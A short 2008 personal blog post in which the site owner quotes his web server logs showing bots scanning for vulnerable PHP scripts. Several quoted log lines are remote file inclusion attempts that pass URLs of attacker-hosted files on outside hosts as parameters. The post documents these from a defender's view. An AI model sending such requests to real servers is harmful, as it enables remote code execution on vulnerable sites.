Browsing through the web logs looking fo ... / 2008-08-26

2008-08-26 Browsing through the web logs looking fo ... 11 years ago
Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable php scripts to break into using an approach of constructing lots of urls with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingling with scans from another IP. Samples:
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="=http://www.ganzkoerperpflege.at/files/oye.txt">http://www.ganzkoerperpflege.at/files/oye.txt</a>?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="http://visitingphysicians.com/hrjobs_contacts/r.txt">http://visitingphysicians.com/hrjobs_contacts/r.txt</a>?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813"
193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=<a href="http://starthost.us/pemlk/dark/safe.txt">http:/www.starthost.us/pemlk/darl/safe.txt</a>?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"
The one that puzzles me because I see a lot of it and can't find the associated vulnerability:
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=<a href="http://javva.com/id.txt">http://javva.com/id.txt</a>? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
Not an advertisment for php, this.

Tags: , , ,

, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
RSS
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated in 0.004424 seconds.